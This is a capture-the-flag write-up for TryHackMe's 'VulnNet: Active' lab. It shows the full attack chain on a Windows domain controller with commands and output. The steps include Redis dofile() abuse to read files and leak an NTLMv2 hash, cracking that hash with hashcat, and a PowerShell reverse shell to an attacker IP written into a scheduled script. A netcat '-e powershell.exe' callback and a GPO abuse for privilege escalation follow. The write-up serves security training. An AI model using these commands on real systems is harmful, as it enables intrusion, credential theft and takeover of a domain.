VulnNet: Active [THM]
TryHackMe - VulnNet: Active - Write-Up
Port scan
Let's start off by performing a port scan against the target system.
┌──(n㉿kali)-[~]
└─$ nmap -sT -sC -sV -vvv -p- -T4 -Pn -oA nmapscan 10.10.188.12# Nmap 7.91 scan initiated Sun Aug 1 15:06:30 2021 as: nmap -sT -sC -sV -vvv -p- -T4 -Pn -oA nmapscan 10.10.188.12
Nmap scan report for 10.10.188.12
Host is up, received user-set (0.055s latency).
Scanned at 2021-08-01 15:06:30 CEST for 187s
Not shown: 65523 filtered ports
Reason: 65523 no-responses
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
445/tcp open microsoft-ds? syn-ack
6379/tcp open redis syn-ack Redis key-value store 2.8.2402
9389/tcp open mc-nmf syn-ack .NET Message Framing
49665/tcp open msrpc syn-ack Microsoft Windows RPC
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49668/tcp open msrpc syn-ack Microsoft Windows RPC
49675/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49676/tcp open msrpc syn-ack Microsoft Windows RPC
49695/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 0s
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 9176/tcp): CLEAN (Timeout)
| Check 2 (port 50061/tcp): CLEAN (Timeout)
| Check 3 (port 54977/udp): CLEAN (Timeout)
| Check 4 (port 50181/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-security-mode:
| 2.02:
|_ Message signing enabled and required
| smb2-time:
| date: 2021-08-01T13:08:59
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Aug 1 15:09:37 2021 -- 1 IP address (1 host up) scanned in 187.42 secondsInteresting ports... 139, 445, 6379
SMB enumeration
Maybe SMB will disclose any useful information. Simply connecting to the target machine using smbclient doesn't help much.
┌──(n㉿kali)-[~]
└─$ smbclient -L \\\\10.10.188.12
Enter WORKGROUP\n's password:
Anonymous login successful
Sharename Type Comment
--------- ---- -------
SMB1 disabled -- no workgroup availableHowever, we are able to at least identify a hostname and domain name using crackmapexec.
┌──(n㉿kali)-[~]
└─$ crackmapexec smb 10.10.188.12
SMB 10.10.188.12 445 VULNNET-BC3TCK1 [*] Windows 10.0 Build 17763 x64 (name:VULNNET-BC3TCK1) (domain:vulnnet.local) (signing:True) (SMBv1:False)Redis enumeration
A quick google search revealed that Redis is an in-memory data structure store, used as a database, cache, and message broker.
Using redis-cli, we are able to query the system for information.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ redis-cli -h 10.10.188.12
10.10.188.12:6379> INFO
# Server
redis_version:2.8.2402
redis_git_sha1:00000000
redis_git_dirty:0
redis_build_id:b2a45a9622ff23b7
redis_mode:standalone
os:Windows
arch_bits:64
multiplexing_api:winsock_IOCP
process_id:3252
run_id:c281e091e328ed486243adaf6bc305583228de06
tcp_port:6379
uptime_in_seconds:2708
uptime_in_days:0
hz:10
lru_clock:435938
config_file:
# Clients
connected_clients:3
client_longest_output_list:0
client_biggest_input_buf:0
blocked_clients:0
# Memory
used_memory:987760
used_memory_human:964.61K
used_memory_rss:954216
used_memory_peak:987760
used_memory_peak_human:964.61K
used_memory_lua:36864
mem_fragmentation_ratio:0.97
mem_allocator:dlmalloc-2.8
# Persistence
loading:0
rdb_changes_since_last_save:0
rdb_bgsave_in_progress:0
rdb_last_save_time:1627823182
rdb_last_bgsave_status:ok
rdb_last_bgsave_time_sec:-1
rdb_current_bgsave_time_sec:-1
aof_enabled:0
aof_rewrite_in_progress:0
aof_rewrite_scheduled:0
aof_last_rewrite_time_sec:-1
aof_current_rewrite_time_sec:-1
aof_last_bgrewrite_status:ok
aof_last_write_status:ok
# Stats
total_connections_received:9
total_commands_processed:12
instantaneous_ops_per_sec:0
total_net_input_bytes:283
total_net_output_bytes:0
instantaneous_input_kbps:0.00
instantaneous_output_kbps:0.00
rejected_connections:0
sync_full:0
sync_partial_ok:0
sync_partial_err:0
expired_keys:0
evicted_keys:0
keyspace_hits:0
keyspace_misses:0
pubsub_channels:0
pubsub_patterns:0
latest_fork_usec:0
# Replication
role:master
connected_slaves:0
master_repl_offset:0
repl_backlog_active:0
repl_backlog_size:1048576
repl_backlog_first_byte_offset:0
repl_backlog_histlen:0
# CPU
used_cpu_sys:0.08
used_cpu_user:0.20
used_cpu_sys_children:0.00
used_cpu_user_children:0.00
# Keyspace10.10.188.12:6379> CONFIG GET *
1) "dbfilename"
2) "dump.rdb"
3) "requirepass"
4) ""
5) "masterauth"
6) ""
7) "unixsocket"
8) ""
9) "logfile"
10) ""
11) "pidfile"
12) "/var/run/redis.pid"
13) "maxmemory"
14) "0"
15) "maxmemory-samples"
16) "3"
17) "timeout"
18) "0"
19) "tcp-keepalive"
20) "0"
21) "auto-aof-rewrite-percentage"
22) "100"
23) "auto-aof-rewrite-min-size"
24) "67108864"
25) "hash-max-ziplist-entries"
26) "512"
27) "hash-max-ziplist-value"
28) "64"
29) "list-max-ziplist-entries"
30) "512"
31) "list-max-ziplist-value"
32) "64"
33) "set-max-intset-entries"
34) "512"
35) "zset-max-ziplist-entries"
36) "128"
37) "zset-max-ziplist-value"
38) "64"
39) "hll-sparse-max-bytes"
40) "3000"
41) "lua-time-limit"
42) "5000"
43) "slowlog-log-slower-than"
44) "10000"
45) "latency-monitor-threshold"
46) "0"
47) "slowlog-max-len"
48) "128"
49) "port"
50) "6379"
51) "tcp-backlog"
52) "511"
53) "databases"
54) "16"
55) "repl-ping-slave-period"
56) "10"
57) "repl-timeout"
58) "60"
59) "repl-backlog-size"
60) "1048576"
61) "repl-backlog-ttl"
62) "3600"
63) "maxclients"
64) "10000"
65) "watchdog-period"
66) "0"
67) "slave-priority"
68) "100"
69) "min-slaves-to-write"
70) "0"
71) "min-slaves-max-lag"
72) "10"
73) "hz"
74) "10"
75) "repl-diskless-sync-delay"
76) "5"
77) "no-appendfsync-on-rewrite"
78) "no"
79) "slave-serve-stale-data"
80) "yes"
81) "slave-read-only"
82) "yes"
83) "stop-writes-on-bgsave-error"
84) "yes"
85) "daemonize"
86) "no"
87) "rdbcompression"
88) "yes"
89) "rdbchecksum"
90) "yes"
91) "activerehashing"
92) "yes"
93) "repl-disable-tcp-nodelay"
94) "no"
95) "repl-diskless-sync"
96) "no"
97) "aof-rewrite-incremental-fsync"
98) "yes"
99) "aof-load-truncated"
100) "yes"
101) "appendonly"
102) "no"
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"
105) "maxmemory-policy"
106) "volatile-lru"
107) "appendfsync"
108) "everysec"
109) "save"
110) "jd 3600 jd 300 jd 60"
111) "loglevel"
112) "notice"
113) "client-output-buffer-limit"
114) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
115) "unixsocketperm"
116) "0"
117) "slaveof"
118) ""
119) "notify-keyspace-events"
120) ""
121) "bind"
122) ""Scrolling through the output of different commands, we stumble across the "dir" path which contains a username.
103) "dir"
104) "C:\\Users\\enterprise-security\\Downloads\\Redis-x64-2.8.2402"Obtaining the user flag
After hours of research, it turns out that Redis can execute sandboxed Lua scripts through the “EVAL” command. dofile() is a command that can be used to enumerate files and directories. dofile() is allowed by the sandbox in older Redis versions.
If the Lua script is syntactically invalid or tries to set global variables, some content of the target file will be leaked through the error messages.
Why not try reading the user.txt file?
┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ redis-cli -h 10.10.188.12 -p 6379 eval "dofile('C:\\\Users\\\enterprise-security\\\Desktop\\\user.txt')" 0
(error) ERR Error running script (call to f_ce5d85ea1418770097e56c1b605053114cc3ff2e): @user_script:1: C:\Users\enterprise-security\Desktop\user.txt:1: malformed number near 'FLAG-REDACTED' Source: Red Team Diary, Entry #2: Stealthily Backdooring CMS Through Redis’ Memory Space
Capturing NTLMv2 hash
Maybe there is a way to capture an NTLM hash? Let's give that a try by running Responder.
┌──(n㉿kali)-[~]
└─$ sudo responder -I tun0
.----.-----.-----.-----.-----.-----.--| |.-----.----.
| _| -__|__ --| _ | _ | | _ || -__| _|
|__| |_____|_____| __|_____|__|__|_____||_____|__|
|__|
NBT-NS, LLMNR & MDNS Responder 3.0.6.0
Author: Laurent Gaffie (laurent.gaffie@gmail.com)
To kill this script hit CTRL-C
[+] Poisoners:
LLMNR [ON]
NBT-NS [ON]
DNS/MDNS [ON]
[+] Servers:
HTTP server [ON]
HTTPS server [ON]
WPAD proxy [OFF]
Auth proxy [OFF]
SMB server [ON]
Kerberos server [ON]
SQL server [ON]
FTP server [ON]
IMAP server [ON]
POP3 server [ON]
SMTP server [ON]
DNS server [ON]
LDAP server [ON]
RDP server [ON]
DCE-RPC server [ON]
WinRM server [ON]
[+] HTTP Options:
Always serving EXE [OFF]
Serving EXE [OFF]
Serving HTML [OFF]
Upstream Proxy [OFF]
[+] Poisoning Options:
Analyze Mode [OFF]
Force WPAD auth [OFF]
Force Basic Auth [OFF]
Force LM downgrade [OFF]
Fingerprint hosts [OFF]
[+] Generic Options:
Responder NIC [tun0]
Responder IP [10.9.1.246]
Challenge set [random]
Don't Respond To Names ['ISATAP']
[+] Current Session Variables:
Responder Machine Name [WIN-MJ06EI78D1C]
Responder Domain Name [7KD0.LOCAL]
Responder DCE-RPC Port [45088]
[+] Listening for events...Using the "EVAL" command, we can instruct the target system to connect back to our target machine.
┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─$ redis-cli -h 10.10.188.12 -p 6379 eval "dofile('//10.9.1.246//share')" 0
(error) ERR Error running script (call to f_3d1b58af3586d137babc26eb9ef689a682da5aef): @user_script:1: cannot open //10.9.1.246//oof: Invalid argument We captured a hash!
[SMB] NTLMv2-SSP Client : 10.10.188.12
[SMB] NTLMv2-SSP Username : VULNNET\enterprise-security
[SMB] NTLMv2-SSP Hash : enterprise-security::VULNNET:8384dad31c118aef:615A31F98510A3488251629F7D84FF7C:010004EA4..........Cracking NTLMv2 hash
Let's get cracking!
┌──(n㉿kali)-[~/Documents/TryHackMe/VPN]
└─ hashcat -a0 -m 5600 hash.hash /usr/share/wordlists/rockyou.txt
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344384
* Bytes.....: 139921497
* Keyspace..: 14344384
ENTERPRISE-SECURITY::enterprise-security::VULNNET:8384dad31c118aef:615A31F98510A3488251629F7D84FF7C:010004EA4..........:PASSWORD-REDACTED
Session..........: hashcat
Status...........: Cracked
Hash.Type........: NetNTLMv2
Hash.Target......: ENTERPRISE-SECURITY::VULNNET:8384dad31c118aef:615a3...000000
Time.Started.....: Wed Aug 4 22:26:07 2021 (1 sec)
Time.Estimated...: Wed Aug 4 22:26:08 2021 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 23233.5 kH/s (9.47ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 5898240/14344384 (41.12%)
Rejected.........: 0/5898240 (0.00%)
Restore.Point....: 3932160/14344384 (27.41%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: seaford12 -> madru_gada
Hardware.Mon.#1..: Temp: 48c Util: 18% Core:1890MHz Mem:5000MHz Bus:8More SMB enumeration
Using the username and password we found earlier, we can try enumerating SMB again.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient -L \\\\10.10.188.12 -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
Enterprise-Share Disk
IPC$ IPC Remote IPC
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
SMB1 disabled -- no workgroup available Let's check out the Enterprise-Share share.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Feb 23 23:45:41 2021
.. D 0 Tue Feb 23 23:45:41 2021
PurgeIrrelevantData_1826.ps1 A 69 Wed Feb 24 01:33:18 2021
9558271 blocks of size 4096. 4996387 blocks availableThe PurgeIrrelevantData_1826.ps1 script seems to be a part of some scheduled task.
Setting up a Netcat listener
I wonder if we can spawn a shell by overwriting the contents of this ps1 file.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...Command Injection - Powershell
Let's modify the contents of PurgeIrrelevantData_1826.ps1 so that it will spawn a shell for us.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ cat PurgeIrrelevantData_1826.ps1
$client = New-Object System.Net.Sockets.TCPClient('10.9.1.246',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close() Source: PayloadsAllTheThings Cheatsheet Reverse Shell Powershell
We can overwrite the file with our edited version of the script on the target machine.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\Enterprise-Share -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
Try "help" to get a list of possible commands.
smb: \> put PurgeIrrelevantData_1826.ps1
putting file PurgeIrrelevantData_1826.ps1 as \PurgeIrrelevantData_1826.ps1 (4.3 kb/s) (average 4.3 kb/s)
smb: \> put nc.exe
putting file nc.exe as \nc.exe (288.6 kb/s) (average 186.3 kb/s)I also uploaded the Netcat executable since I didn't receive any STDERR / STDOUT while enumerating the machine using Powershell.
Receiving a shell
WE GOT A SHELL!
┌──(n㉿kali)-[~]
└─$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 49872
whoami
vulnnet\enterprise-security
PS C:\Users\enterprise-security\Downloads> A more stable shell
┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666
listening on [any] 6666 ...PS C:\enterprise-share> Start-Process -FilePath "C:\enterprise-share\nc.exe" -ArgumentList "-nv 10.9.1.246 6666 -e powershell.exe"Necesarry? No. But definitely helpful when you accidentally exit out of your shell.
┌──(n㉿kali)-[~]
└─$ nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.9.1.246] from (UNKNOWN) [10.10.188.12] 50037
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.
PS C:\enterprise-share> PowerView - enumeration
After hours of enumeration, I found something interesting.
Two GPOs: security-pol-vn and Default Domain Controllers Policy.
PS C:\enterprise-share> get-netgpo
get-netgpo
flags : 0
name : {31B2F340-016D-11D2-945F-00C04FB984F9}
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}][{B1BE8D72-6EAC-11D2-A4EA-00
C04F79F83A}{53D6AB1B-2488-11D1-A28C-00C04FB94F17}]
whenchanged : 2/23/2021 11:09:44 PM
versionnumber : 3
systemflags : -1946157056
objectguid : 9d593bf2-13ac-4df7-97a9-faff2abd3e2c
showinadvancedviewonly : True
usnchanged : 20506
dscorepropagationdata : {2/23/2021 11:08:53 PM, 2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
displayname : security-pol-vn
gpcfunctionalityversion : 2
cn : {31B2F340-016D-11D2-945F-00C04FB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}
distinguishedname : CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
usncreated : 5672
whencreated : 2/23/2021 9:30:33 AM
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=local
flags : 0
name : {6AC1786C-016F-11D2-945F-00C04fB984F9}
gpcmachineextensionnames : [{35378EAC-683F-11D2-A89A-00C04FBBCFA2}{D02B1F72-3407-48AE-BA88-E8213C6761F1}][{827D319E-6EA
C-11D2-A4EA-00C04F79F83A}{803E14A0-B4FB-11D0-A0D0-00A0C90F574B}]
whenchanged : 2/24/2021 12:14:52 AM
versionnumber : 4
systemflags : -1946157056
objectguid : 71ee1493-0079-40b4-80f0-8ba42c4f61d5
showinadvancedviewonly : True
usnchanged : 24594
dscorepropagationdata : {2/23/2021 9:32:08 AM, 1/1/1601 12:00:00 AM}
displayname : Default Domain Controllers Policy
gpcfunctionalityversion : 2
cn : {6AC1786C-016F-11D2-945F-00C04fB984F9}
iscriticalsystemobject : True
gpcfilesyspath : \\vulnnet.local\sysvol\vulnnet.local\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}
distinguishedname : CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,CN=System,DC=vulnnet,DC=local
usncreated : 5675
whencreated : 2/23/2021 9:30:33 AM
instancetype : 4
objectclass : {top, container, groupPolicyContainer}
objectcategory : CN=Group-Policy-Container,CN=Schema,CN=Configuration,DC=vulnnet,DC=localBloodHound - enumeration
Let's get graphical!
PS C:\enterprise-share> .\sharphound.exe
----------------------------------------------
Initializing SharpHound at 1:49 PM on 8/4/2021
----------------------------------------------
Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container
[+] Creating Schema map for domain VULNNET.LOCAL using path CN=Schema,CN=Configuration,DC=vulnnet,DC=local
[+] Cache File not Found: 0 Objects in cache
[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 59 objects finished (+59 59)/s -- Using 26 MB RAM
Enumeration finished in 00:00:01.1978320
Compressing data to .\20210804134951_BloodHound.zip
You can upload this file directly to the UI
SharpHound Enumeration Completed at 1:49 PM on 8/4/2021! Happy Graphing!
Shortest Path to Domain Admin
Querying BloodHound, we find that our enterprise-security user has GenericWrite access on the security-pol-vn GPO which is being applied to essentially all objects within the vulnnet.local domain.
Maybe we can exploit this misconfiguration.... Let's find out!
Abusing GPO permissions
Let's see what we can do to escalate our privileges.
PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 4:01:37 PM
Password expires Never
Password changeable 2/24/2021 4:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/4/2021 1:08:48 PM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Domain Users
The command completed successfully.We may try adding the enterprise-security user to the local Administrators group leveraging a tool called SharpGPOAbuse.
PS C:\enterprise-share> .\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
.\SharpGPOAbuse.exe --AddComputerTask --TaskName "Debug" --Author vulnnet\administrator --Command "cmd.exe" --Arguments "/c net localgroup administrators enterprise-security /add" --GPOName "SECURITY-POL-VN"
[+] Domain = vulnnet.local
[+] Domain Controller = VULNNET-BC3TCK1SHNQ.vulnnet.local
[+] Distinguished Name = CN=Policies,CN=System,DC=vulnnet,DC=local
[+] GUID of "SECURITY-POL-VN" is: {31B2F340-016D-11D2-945F-00C04FB984F9}
[+] Creating file \\vulnnet.local\SysVol\vulnnet.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!
PS C:\enterprise-share> gpupdate /force
gpupdate /force
Updating policy...
Computer Policy update has completed successfully.
User Policy update has completed successfully.Let's review our group memberships after we forced the policies to be updated on the target machine.
PS C:\enterprise-share> net user enterprise-security
net user enterprise-security
User name enterprise-security
Full Name Enterprise Security
Comment TryHackMe
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/23/2021 4:01:37 PM
Password expires Never
Password changeable 2/24/2021 4:01:37 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 8/4/2021 1:08:48 PM
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *Domain Users
The command completed successfully.There we go! The enterprise-security account is now a local administrator.
Obtaining the system flag
Now that we have more privileges, let's access the C$ share and grab the system.txt file.
┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ smbclient \\\\10.10.188.12\\C$ -U enterprise-security@vulnnet.local
Enter enterprise-security@vulnnet.local's password:
smb: \users\Administrator\Desktop\> ls
. DR 0 Wed Feb 24 05:27:33 2021
.. DR 0 Wed Feb 24 05:27:33 2021
desktop.ini AHS 282 Mon Feb 22 22:55:21 2021
system.txt A 37 Wed Feb 24 05:27:45 2021
9558271 blocks of size 4096. 5011466 blocks available
smb: \users\Administrator\Desktop\> mget system.txt
Get file system.txt? y
getting file \users\Administrator\Desktop\system.txt of size 37 as system.txt (0.3 KiloBytes/sec) (average 0.3 KiloBytes/sec)┌──(n㉿kali)-[~/Documents/TryHackMe/VulNetActive]
└─$ cat system.txt
THM{FLAG-REDACTED} Pwned!
Last updated
Was this helpful?